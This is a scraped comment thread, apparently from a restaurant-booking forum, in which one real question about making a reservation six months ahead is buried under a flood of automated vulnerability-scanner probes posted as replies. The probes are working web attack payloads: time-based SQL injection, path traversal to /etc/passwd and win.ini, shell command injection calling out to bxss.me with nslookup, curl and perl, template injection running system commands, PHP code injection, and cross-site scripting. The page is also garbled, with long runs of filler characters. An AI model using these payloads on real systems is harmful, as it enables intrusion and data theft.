.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+291-291-1=0+0+0+1 --
re: guest
-1 OR 3+291-291-1=0+0+0+1 --
re: guest
-1 OR 2+58-58-1=0+0+0+1
re: guest
-1 OR 3+58-58-1=0+0+0+1
re: guest
-1' OR 2+133-133-1=0+0+0+1 --
re: guest
-1' OR 3+133-133-1=0+0+0+1 --
re: guest
-1' OR 2+67-67-1=0+0+0+1 or 'TB3ZOC9V'='
re: guest
-1' OR 3+67-67-1=0+0+0+1 or 'TB3ZOC9V'='
re: guest
-1" OR 2+922-922-1=0+0+0+1 --
re: guest
-1" OR 3+922-922-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
6FBn4ojt'; waitfor delay '0:0:15' --
re: guest
-5 OR 229=(SELECT 229 FROM PG_SLEEP(15))--
re: guest
-5) OR 530=(SELECT 530 FROM PG_SLEEP(15))--
re: guest
-1)) OR 478=(SELECT 478 FROM PG_SLEEP(15))--
re: guest
uJFzFk6A' OR 339=(SELECT 339 FROM PG_SLEEP(15))--
re: guest
aq1wxWzc') OR 420=(SELECT 420 FROM PG_SLEEP(15))--
re: guest
XYintX21')) OR 70=(SELECT 70 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@VuZDJ
re: guest
139LSR5KT0
re: guest
response.write(9945126*9557535)
re: guest
'+response.write(9945126*9557535)+'
re: guest
"+response.write(9945126*9557535)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999196+10000098}
re: guest
../
re: guest
redirtest.acx
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
echo insijm$()\ yoqhre\nz^xyu||a #' &echo insijm$()\ yoqhre\nz^xyu||a #|" &echo insijm$()\ yoqhre\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitxr'.'ugoyaqcdc1a43.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(83).chr(109).chr(85).'
re: guest
&echo zxixiv$()\ dqjstk\nz^xyu||a #' &echo zxixiv$()\ dqjstk\nz^xyu||a #|" &echo zxixiv$()\ dqjstk\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
".gethostbyname(lc("hitmp"."mwpchjvwc4614.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(88).chr(97).chr(80)."
re: guest
|echo tqmbtm$()\ inhvzb\nz^xyu||a #' |echo tqmbtm$()\ inhvzb\nz^xyu||a #|" |echo tqmbtm$()\ inhvzb\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
gethostbyname(lc('hitdd'.'pddqogyxfaae7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(67).chr(101).chr(77)
re: guest
expr 9000488442 - 930255
re: guest
/etc/shells
re: guest
(nslookup -q=cname hitdiqtxnvurs082cc.bxss.me||curl hitdiqtxnvurs082cc.bxss.me))
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
$(nslookup -q=cname hithdqpoypicl2d882.bxss.me||curl hithdqpoypicl2d882.bxss.me)
re: guest
c:/windows/win.ini
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
&nslookup -q=cname hitwzxlukzpqpdcd5d.bxss.me&'\"`0&nslookup -q=cname hitwzxlukzpqpdcd5d.bxss.me&`'
re: guest
bxss.me
re: guest
&(nslookup -q=cname hitggtlqnxmfw7305e.bxss.me||curl hitggtlqnxmfw7305e.bxss.me)&'\"`0&(nslookup -q=cname hitggtlqnxmfw7305e.bxss.me||curl hitggtlqnxmfw7305e.bxss.me)&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
|(nslookup -q=cname hitufxdjszwdidf718.bxss.me||curl hitufxdjszwdidf718.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
`(nslookup -q=cname hitclkpahijlzac2f6.bxss.me||curl hitclkpahijlzac2f6.bxss.me)`
re: guest
;(nslookup -q=cname hitudpzojppwqe98b2.bxss.me||curl hitudpzojppwqe98b2.bxss.me)|(nslookup -q=cname hitudpzojppwqe98b2.bxss.me||curl hitudpzojppwqe98b2.bxss.me)&(nslookup -q=cname hitudpzojppwqe98b2.bxss.me||curl hitudpzojppwqe98b2.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hithleznsywuw2c511.bxss.me||curl${IFS}hithleznsywuw2c511.bxss.me)
re: guest
'"()
re: guest
';print(md5(31337));$a='
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitfjivkbpkgeecb59.bxss.me||curl${IFS}hitfjivkbpkgeecb59.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfjivkbpkgeecb59.bxss.me||curl${IFS}hitfjivkbpkgeecb59.bxss.me)&`'
re: guest
'&&sleep(27*1000)*oqyonj&&'
re: guest
";print(md5(31337));$a="
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"&&sleep(27*1000)*glnajt&&"
re: guest
${@print(md5(31337))}
re: guest
bxss.me/t/xss.html?%00
re: guest
'||sleep(27*1000)*hewtdx||'
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
"||sleep(27*1000)*dkwhyp||"
re: guest
"+"A".concat(70-3).concat(22*4).concat(103).concat(66).concat(101).concat(86)+(require"socket"
Socket.gethostbyname("hitrl"+"kczukhpib1c7a.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(117).concat(71).concat(104).concat(77)+(require'socket'
Socket.gethostbyname('hitza'+'ypnwnloz6bed2.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(103).concat(67).concat(102).concat(86)+(require'socket'
Socket.gethostbyname('hitax'+'dosyscgrda059.bxss.me.')[3].to_s)
re: guest
'"
re: guest
<!--
re: guest
replies
re: guest
replies�
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >iXiy(9334)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitlphbryclxtc552f.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >iXiy(9430)</ScRiPt>
re: guest
9738920
re: guest
8MG3DQUZ
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
EdvZ6gDa'; waitfor delay '0:0:15' --
re: guest
-1 OR 272=(SELECT 272 FROM PG_SLEEP(15))--
re: guest
-1) OR 296=(SELECT 296 FROM PG_SLEEP(15))--
re: guest
-1)) OR 479=(SELECT 479 FROM PG_SLEEP(15))--
re: guest
360ItFrA' OR 746=(SELECT 746 FROM PG_SLEEP(15))--
re: guest
kpfWE4Ut') OR 696=(SELECT 696 FROM PG_SLEEP(15))--
re: guest
xS3xWqkP')) OR 881=(SELECT 881 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@2jPsS
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
@gomaizo How to make reservation 6 months in advance. In Pocket Concierge, they only allow waiting list till end of August. Thanks
re: Henry
8Lf8Xnif
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
-1 OR 2+665-665-1=0+0+0+1
re: Henry
-1 OR 3+665-665-1=0+0+0+1
re: Henry
if(now()=sysdate(),sleep(15),0)
re: Henry
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Henry
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Henry
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Henry
-1; waitfor delay '0:0:15' --
re: Henry
-1); waitfor delay '0:0:15' --
re: Henry
1 waitfor delay '0:0:15' --
re: Henry
NNvIb2M7'; waitfor delay '0:0:15' --
re: Henry
-5 OR 967=(SELECT 967 FROM PG_SLEEP(15))--
re: Henry
-5) OR 729=(SELECT 729 FROM PG_SLEEP(15))--
re: Henry
-1)) OR 472=(SELECT 472 FROM PG_SLEEP(15))--
re: Henry
b1BZvXLU' OR 26=(SELECT 26 FROM PG_SLEEP(15))--
re: Henry
Bqr5xLIn') OR 319=(SELECT 319 FROM PG_SLEEP(15))--
re: Henry
gliEahCV')) OR 797=(SELECT 797 FROM PG_SLEEP(15))--
re: Henry
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Henry
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Henry
'||(select 1 from (select pg_sleep(15))x)||'
re: Henry
''||(select 1 from (select pg_sleep(15))x)||''
re: Henry
1'"
re: Henry
@@j9bkk
re: Henry
HPD6YBHM
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
1*
re: Henry
-1 OR 2+593-593-1=0+0+0+1
re: Henry
-1 OR 3+593-593-1=0+0+0+1
re: Henry
if(now()=sysdate(),sleep(15),0)
re: Henry
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Henry
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Henry
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Henry
-1; waitfor delay '0:0:15' --
re: Henry
-1); waitfor delay '0:0:15' --
re: Henry
1 waitfor delay '0:0:15' --
re: Henry
qOY4KtzZ'; waitfor delay '0:0:15' --
re: Henry
-5 OR 850=(SELECT 850 FROM PG_SLEEP(15))--
re: Henry
-5) OR 746=(SELECT 746 FROM PG_SLEEP(15))--
re: Henry
-1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))--
re: Henry
Obehu50F' OR 484=(SELECT 484 FROM PG_SLEEP(15))--
re: Henry
34zcVIeW') OR 161=(SELECT 161 FROM PG_SLEEP(15))--
re: Henry
eFzO6hRW')) OR 533=(SELECT 533 FROM PG_SLEEP(15))--
re: Henry
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Henry
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Henry
'||(select 1 from (select pg_sleep(15))x)||'
re: Henry
''||(select 1 from (select pg_sleep(15))x)||''
re: Henry
1'"
re: Henry
@@1S4Oy
re: Henry
1DNFYRPPQSO
re: Henry
%0abcc:074625.67-22339.67.ef4b1.19990.2@bxss.me
re: Henry
response.write(9138612*9705807)
re: Henry
to@example.com>%0d%0abcc:074625.67-22340.67.ef4b1.19990.2@bxss.me
re: Henry
'+response.write(9138612*9705807)+'
re: Henry
"+response.write(9138612*9705807)+"
re: Henry
${9999215+10000214}
re: Henry
<esi:include src="http://bxss.me/rpb.png"/>
re: Henry
../../../../../../../../../../../../../../etc/passwd
re: Henry
../../../../../../../../../../../../../../windows/win.ini
re: Henry
file:///etc/passwd
re: Henry
../../../../../../../../../../../../../../../proc/version
re: Henry
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Henry
'.gethostbyname(lc('hitpu'.'imnlrfif85b5c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(68).chr(107).chr(80).'
re: Henry
../../../../../../../../../../etc/passwd%00.jpg
re: Henry
".gethostbyname(lc("hitbu"."pxlnsetieb525.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(73).chr(104).chr(75)."
re: Henry
)
re: Henry
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Henry
!(()&&!|*|*|
re: Henry
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Henry
^(#$!@#$)(()))******
re: Henry
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Henry
/etc/passwd
re: Henry
echo zztjjr$()\ ntgitq\nz^xyu||a #' &echo zztjjr$()\ ntgitq\nz^xyu||a #|" &echo zztjjr$()\ ntgitq\nz^xyu||a #
re: Henry
%2fetc%2fpasswd
re: Henry
&echo coclzj$()\ kckglv\nz^xyu||a #' &echo coclzj$()\ kckglv\nz^xyu||a #|" &echo coclzj$()\ kckglv\nz^xyu||a #
re: Henry
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Henry
|echo rlkmie$()\ rbpwwb\nz^xyu||a #' |echo rlkmie$()\ rbpwwb\nz^xyu||a #|" |echo rlkmie$()\ rbpwwb\nz^xyu||a #
re: Henry
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Henry
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Henry
(nslookup hitbvdofzsilyc5c6f.bxss.me||perl -e "gethostbyname('hitbvdofzsilyc5c6f.bxss.me')")
re: Henry
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Henry
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Henry
$(nslookup hitwqvmuxypxa9035f.bxss.me||perl -e "gethostbyname('hitwqvmuxypxa9035f.bxss.me')")
re: Henry
Http://bxss.me/t/fit.txt
re: Henry
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Henry
&nslookup hitwrvafbhfva55f95.bxss.me&'\"`0&nslookup hitwrvafbhfva55f95.bxss.me&`'
re: Henry
http://bxss.me/t/fit.txt%3F.jpg
re: Henry
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Henry
&(nslookup hitltuuwfccbu17595.bxss.me||perl -e "gethostbyname('hitltuuwfccbu17595.bxss.me')")&'\"`0&(nslookup hitltuuwfccbu17595.bxss.me||perl -e "gethostbyname('hitltuuwfccbu17595.bxss.me')")&`'
re: Henry
/etc/shells
re: Henry
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Henry
|(nslookup hitqyfnmujncq06f53.bxss.me||perl -e "gethostbyname('hitqyfnmujncq06f53.bxss.me')")
re: Henry
c:/windows/win.ini
re: Henry
file:///etc/passwd
re: Henry
`(nslookup hitjognvwhtwu786da.bxss.me||perl -e "gethostbyname('hitjognvwhtwu786da.bxss.me')")`
re: Henry
bxss.me
re: Henry
/\../\../\../\../\../\../\../etc/passwd
re: Henry
;(nslookup hitwqqyuidkwyd6ce8.bxss.me||perl -e "gethostbyname('hitwqqyuidkwyd6ce8.bxss.me')")|(nslookup hitwqqyuidkwyd6ce8.bxss.me||perl -e "gethostbyname('hitwqqyuidkwyd6ce8.bxss.me')")&(nslookup hitwqqyuidkwyd6ce8.bxss.me||perl -e "gethostbyname('hitwqqyuidkwyd6ce8.bxss.me')")
re: Henry
/WEB-INF/web.xml
re: Henry
C:\WINDOWS\system32\drivers\etc\hosts
re: Henry
../../../../../../../../../../windows/win.ini%00.jpg
re: Henry
/../../../../../../../../../../boot.ini
re: Henry
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Henry
..\..\..\..\..\..\..\..\windows\win.ini
re: Henry
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Henry
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Henry
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Henry
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Henry
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Henry
WEB-INF/web.xml
re: Henry
WEB-INF\web.xml
re: Henry
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Henry
